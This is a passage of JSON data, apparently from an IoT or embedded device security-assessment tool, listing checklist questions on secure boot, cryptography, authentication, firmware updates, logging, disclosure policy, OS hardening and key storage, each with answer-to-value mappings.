boot?","propertyID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5"},{"ID":"9b600522-8621-4f50-b71c-856efeb246cc","Name":"Missing immutable Root of Trust","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device has a immutable Root of Trust in hardware?","propertyID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6"},{"ID":"ca231237-0565-407d-a5f3-0f77f80a3c50","Name":"Improper boot order","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device boot the next stage only after the successful boot of the previous stage? ","propertyID":"eb678bc0-3ece-4937-bba3-03981c5759a4"},{"ID":"abc4b5fe-d936-41c8-9a8f-57c72c9bc3e1","Name":"TOCTOU attack","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Is code checked for validity and trust immediately before running the code (to reduce Time of Check to Time of Use attacks)?","propertyID":"f3697413-e4de-4572-90b1-8041e8ff9b67"},{"ID":"8ac90b2d-7494-47de-8cc9-7ccb6d627bd8","Name":"Boot Code Protection in RAM","Description":"","OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device protect boot code (from ROM) during execution in a volatile memory?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"885834f4-b8b6-485b-8690-6ac525dbb59d"},{"ID":"0e71f794-64d0-4aca-bbfd-3cc3593b8b5b","Name":"Less-secure downgrade","Description":"","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device\'s TLS version and configuration exclude less-secure algorithms? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b"},{"ID":"b7546823-207e-4dcd-a65f-75be3f1e8d4f","Name":"Weak block cipher mode","Description":"Deprecated block cipher modes, such as ECB or CBC, do not provide enough security.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"For symmetric algorithms using block ciphers, does the device use strong block cipher modes?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"518bbb50-aeee-4c87-95d1-8724a4dac569"},{"ID":"e8a6964f-fe95-49b9-8d5a-c1914691bb17","Name":"Appropriate parameters","Description":"For example, the encryption scheme may be good, but its parameters are not sufficient (AES-128 vs AES-256, ECC secp256 vs secp384).","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use up-to-date and appropriate parameters for cryptographic primitives?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"08377961-8f56-4b56-b684-331f77810f1d"},{"ID":"3519bc83-7b2b-4116-82fd-66a5b20479a0","Name":"Sufficient entropy","Description":"A strong source of entropy could be a True Random Number Generator (TRNG), human input, etc?\\\\nThe entropy is required for generating true random numbers or to use it as seed for a Cryptographically Secure RNG.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device provide a strong source of entropy?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"420f03a2-1ab7-4bc2-910d-4ea025518da2"},{"ID":"eca78a13-9d1c-47b1-8244-a4e2995ad0d6","Name":"Nonce reuse","Description":"IVs and nonces that are required by many cryptographic algorithms must be used only once and must be generated with high entropy, which is usually ensured by a true random number generator.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use values for initialization vectors (IV) or nonces only once? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"f35ccff8-6497-4b28-8627-7f255bce0e02"},{"ID":"1f2d06c2-db63-4016-b138-417122111a2d","Name":"Roll-back","Description":"For practical reasons a downgrade is probably necessary, but security patches should not be reversible (e.g. by using special security version numbers).","OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device prevent a firmware downgrade (roll-back) to vulnerable versions?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"d951b792-f84b-4ab3-82d1-21867e202755"},{"ID":"ca8aa7ce-e87c-4468-be08-faf66bca1696","Name":"Hard-coded credentials","Description":"For example, does the software or hardware include fixed strings/keys for developer authentication (backdoor)?","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device use/contain hard-coded credentials? ","propertyID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}}},{"ID":"956f9950-0d28-4e4c-8831-8a99030ccafc","Name":"Default credentials","Description":"A common vulnerability are default credentials that can be found in the manual.","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device ship with default credentials?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"714ed1de-855c-491b-8a08-745a99e17413"},{"ID":"4c4a1184-5a53-41dd-8aba-3acb663f3b6b","Name":"Password requirements","Description":"Requirements to length, reuse, common passwords, expiration, etc?","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device enforce requirements to passwords?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"540e39da-3227-4e6c-86ea-32a017318511"},{"ID":"a64b3c96-c3d2-4976-a606-ae97652e2fa5","Name":"Multi-factor authentication","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device support multi-factor authentication?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"88763e20-7878-4525-81d8-c4d09b867042"},{"ID":"7aa200ee-17f1-4092-b6f9-7ef87c96dfb8","Name":"Restriction of attempts","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device restrict failed authentication attempts within a short time frame?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"aa74f499-b995-4f5e-8d92-91f3ca172743"},{"ID":"20146e1b-2de2-4b76-8482-7931a46f6090","Name":"Sensitive (authentication) information exposed","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does an authentication response contain information which requirement is not fulfilled (e.g. password/username is wrong)? ","propertyID":"157fd588-2ea2-4260-9a25-86bf8241b31c"},{"ID":"7a53e800-1166-466e-a5da-e7cbb1f53942","Name":"Session ID expiration","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device invalidate session identifiers (e.g. session ID) after a logout?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"51473250-3891-4342-a8b8-687db16ffef3"},{"ID":"46d4d08b-030e-41ce-b14e-eb6deb5140d5","Name":"Session timeout","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device invalidate a session after a period of inactivity?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"a21a6894-256f-4bfd-bd49-09352d054399"},{"ID":"b554922b-d912-427a-b1c9-e3da880038e1","Name":"Password recovery","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device implement a strong mechanism for password recovery after users forgot it?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d"},{"ID":"b22c80f8-01f7-491c-bb96-f76777bffa8f","Name":"Client-side hashing","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device use a password hash instead of password for authentication (client-side password hashing)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"ba8dc5f0-e1a9-4263-8179-747791b873ee"},{"ID":"ea4835f4-d40f-435b-b75c-e9e616f8337f","Name":"Hidden interfaces","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"Are the hidden interfaces that developers created with the intend to be not publicly available?","propertyID":"311904f3-7898-4bab-ba74-e6024c704cd3"},{"ID":"051f0ffa-a58b-4b1b-bd19-2f46b03417af","Name":"Integrity validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the update routine cryptographically validate the integrity of a software update package before the installation begins?","propertyID":"8f47a4ac-0934-4a65-a6f3-07503c92f658"},{"ID":"181a48c3-9e33-4620-b8eb-de8877caf188","Name":"Authenticity validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the update routine cryptographically validate the authenticity of a software update package before the installation begins?","propertyID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2"},{"ID":"04f1e766-95b6-4b93-9032-337ae1febdb9","Name":"TOCTOU attack","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device ensure that the package cannot be modified or replaced by an attacker between being validated and installed - a TOCTOU (Time of Check to Time of Use) attack?","propertyID":"000441ff-d15f-46c3-bb9c-0c949063271d"},{"ID":"75207b21-020d-4011-9d6e-9cba7f311ac7","Name":"Unknown state","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device implement a fail safe mechanism that will leave the system in a known safe state in the event of a failed update?","propertyID":"3df6a845-52a2-40a9-8978-0277efd7cfcb"},{"ID":"52f64789-fac1-47f7-927c-e2c33ca4567a","Name":"Improper log access control","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Is access to log files restricted to the minimum required rights to function properly?","propertyID":"8e4b2af8-b023-4991-80f5-54ffa28cd616"},{"ID":"0d4af18b-a202-44e5-b8a8-84c8ed7c6576","Name":"Missing separate location for log files","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are logs stored in their own partition, separate from other system files?","propertyID":"418fe90d-88fd-4066-9339-890501ea07f0"},{"ID":"2c3b6a86-04c2-4774-8fed-84178460bd05","Name":"Missing log rotation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Is there a maximum size for logs and is log rotating implemented?","propertyID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f"},{"ID":"90985455-d995-4b8f-93e4-559882304b7c","Name":"Log file overwritten","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are users notified when the log file reaches its maximum size?","propertyID":"95b793b3-b68f-4533-9dc0-4e7d414effe3"},{"ID":"d6d5e1bd-d8c2-4b0c-b85a-b7cd2c9190ed","Name":"Missing log evaluation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are logs regularly monitored and analyzed to extract valuable information and insight?","propertyID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa"},{"ID":"fe03b451-3259-4649-963f-569e6f2f426a","Name":"Regulation compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Do all logged data comply with prevailing data protection regulations?","propertyID":"4006de15-8767-4a09-8678-84b8d6b50ae0"},{"ID":"bcebb419-09f6-41b8-83b3-88923dcac369","Name":"Missing central log backup","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the device securely send logs to a central repository? ","propertyID":"bd32d10e-82d6-4e7f-9247-fe2753908e60"},{"ID":"9c9cdd06-f272-4a71-b83e-ad1d2cf0e9a8","Name":"Log files contain passwords","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the device log passwords?","propertyID":"025e828e-d1a0-4487-9c56-09fd6941d4b9"},{"ID":"65b66adb-05b4-440b-a9e5-30a615ac4e6f","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are authentication attempts logged?","propertyID":"c7d5fd7a-4007-480c-a34b-cb32fab17472"},{"ID":"30c55017-8b6b-4b0b-a591-ddf03e86ee37","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are user login, logout, and inactivity logged?","propertyID":"a154298a-d410-4da4-921d-906165cd5329"},{"ID":"eb07bd86-e1cf-4177-9531-4622c14e0997","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are privilege changes logged?","propertyID":"c86b6500-99cb-46e3-948f-b67b69c9768d"},{"ID":"6bf25a01-2d7e-4f4c-bd18-983b839560bc","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are user management changes logged?","propertyID":"1a582358-45c2-42e2-a21e-61206a4eda7e"},{"ID":"5a2d72ab-1079-4e09-8ded-18f4c1efcf29","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are changes to the firmware logged?","propertyID":"91abf825-cfca-4386-b5d5-8262423b090d"},{"ID":"03c2354d-f29f-4e56-ad13-8b996b7a0c8a","Name":"Missing public policy","Description":"The policy can be provided either in-house or through a third party.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Is there are publicly available vulnerability disclosure policy?","propertyID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d"},{"ID":"591d70ce-8b09-4beb-807a-7b9801e42ec2","Name":"Missing /security page","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the website of the manufacturer use /security to provide security-related topics?","propertyID":"36e1de4b-5129-470f-b06d-208ef7610da8"},{"ID":"1fff723c-b343-432b-a7e1-b5b7780bad03","Name":"Missing security.txt","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the website of the manufacturer provide a security.txt including all security-related sites and contact information?","propertyID":"3affc4da-9a78-43ec-990b-75d20edbc410"},{"ID":"aa359dc1-5ac3-469a-b61c-ce910221acdc","Name":"Missing contact email address","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the manufacturer provide an email account for security related topics?","propertyID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c"},{"ID":"b089383b-9c6b-46ac-b255-59da1c622afe","Name":"Missing PGP key","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the manufacturer provide a PGP on their website for secure communication?","propertyID":"61d4b9c9-19a9-431e-b114-f2c04b48846b"},{"ID":"8b63f920-3f9c-4a00-afba-7b3d328bfd56","Name":"Missing reporting system","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Is there a public vulnerability reporting system?","propertyID":"23943ca9-3df9-4d69-a414-6d8fef99d30c"},{"ID":"45134e98-27a6-4345-b5d2-1584920f9fa4","Name":"Missing timeline info","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there information on the timelines for acknowledgement and resolution of reported issues?","propertyID":"e7d90cc4-822e-4aab-a161-c766cf13df22"},{"ID":"f60997da-93c7-4b86-8ade-c6a8fa03cded","Name":"Missing bug bounty program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there a bug bounty program?","propertyID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4"},{"ID":"9a672303-34ad-48df-9ca0-11c64f057707","Name":"Non-disclosure","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Does the manufacturer enable a coordinated vulnerability disclosure?","propertyID":"dd2c4c41-45f0-4105-aea4-317943e2f435"},{"ID":"81a26318-6836-4280-a146-dbbd515733f2","Name":"Missing Firmware Encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Is the firmware update encrypted?","propertyID":"434d79b2-574c-4575-813b-19ec7854a139"},{"ID":"f797f4ac-1e25-4463-b77c-1a90e7ccdc6a","Name":"Unnecessary components","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Does the operating system only include components (libraries, modules, packages, ...) that are required to support the function of the device?","propertyID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50"},{"ID":"6f7a6386-8b2f-42cc-9433-8f8963362f66","Name":"Outdated OS version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the OS the latest available stable version?","propertyID":"4ba05121-485a-40eb-832a-f4095c7b88df"},{"ID":"d8245144-c203-40b8-8d62-ac822810381d","Name":"Secure configuration not default","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Does the device ship with the most secure configuration in place (security by default)?","propertyID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1"},{"ID":"a5b98b6e-be51-47ca-aeb8-975a5669d590","Name":"Missing component update process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is there a process to update OS components to the latest stable version throughout the lifetime of a deployed device?","propertyID":"36ed4680-0b94-42a9-9863-08eb976c9ebc"},{"ID":"c8caecc4-6cc7-4e60-9013-b7e4ef16a3c2","Name":"Activated services and ports","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Are all ports, protocols, and services that are not used deactivated?","propertyID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6"},{"ID":"6a468670-eb0a-416d-9e22-bac4fa377463","Name":"Improper permission configuration","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the access to the root file system restricted for users/applications?","propertyID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c"},{"ID":"d3df84cb-3ee1-4b90-9bdd-fa33d67ff0d0","Name":"Least privilege violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Have all files and directories the minimum required access rights (least privilege principal)?","propertyID":"7378780b-e280-4494-84f2-0beb4e7257ec"},{"ID":"e4a8a85e-77e2-41d5-85aa-1210083b4f6a","Name":"Missing file system encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the file system encrypted?","propertyID":"85e19877-51a0-4904-8e98-b2fb14be3922"},{"ID":"d1ed0929-25af-4c4f-9cbf-228d0a235e26","Name":"Least privilege violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Does the application operate at the lowest privilege level that is possible, with access only to resources needed (least privilege principal)?","propertyID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0"},{"ID":"333ea9fb-0f19-462d-a7af-0f15322b878c","Name":"Missing application isolation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Is the application isolated from others, e.g. using sandboxing techniques such as virtual machines, containerisation, or hardware mechansims? ","propertyID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25"},{"ID":"2f0371b7-d68e-4ee7-ac59-2f2ee0b8bcf6","Name":"Improper input validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Is all data input sanitized and validated before processing?","propertyID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8"},{"ID":"50c49be8-97f0-42f3-816e-94bea0b35d02","Name":"Keys not stored in security module","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are keys stored in a cryptographic vault, such as a trusted platform module (TPM), secure element (SE), or hardware security module (HSM)? ","propertyID":"64bb2754-a187-47c8-aa93-e599f0a97a57"},{"ID":"3a5c0215-3d89-429a-8cff-becff1a625f3","Name":"Missing key encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are keys encrypted using a key encryption key (KEK)? ","propertyID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e"},{"ID":"3bd6ada0-7f40-4b6a-83cf-502b1eb1a9a5","Name":"Key usage in untrusted environment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are cryptographic operations (such as key access, encryption, and signing) executed in a trusted environment (e.g. separate module)?","propertyID":"b43ada71-51c6-4f5e-b310-a1735a41e602"},{"ID":"575c4c06-6b6f-4982-8f57-d0cf074d0cc9","Name":"Missing tamper resistant unique ID","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Question":"Is the device uniquely identifiable (the ID is factory-set and tamper resistant stored in hardware)?","propertyID":"08ee42e8-3525-4767-98e3-f7492f356d2f"},{"ID":"e3f323c6-a0f4-46bb-ba3b-418970e02d7c","Name":"Missing unique user identification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Are users identified by a unique identifier? ","propertyID":"6391f8f2-eb04-4caf-b490-49c920315867"},{"ID":"207a9b2c-de5c-48a0-9e60-d55de9b13cb3","Name":"Missing privilege differentiation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Is it possible to assign different privileges to users?","propertyID":"cdb65d33-946e-412e-838b-3075e928c4f0"},{"ID":"4ecc4eda-a2e0-4d3e-8bcc-9a606acb2d84","Name":"Improper password storage","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Are passwords stored properly, i.e. using a cryptographic hash function (specifically for passwords) along with a unique unpredictable salt?","propertyID":"984400a6-7bd6-4031-a40c-06f0499e0d86"},{"ID":"ab722480-937d-4b08-98ec-fa7898115e4e","Name":"Missing certificate chain 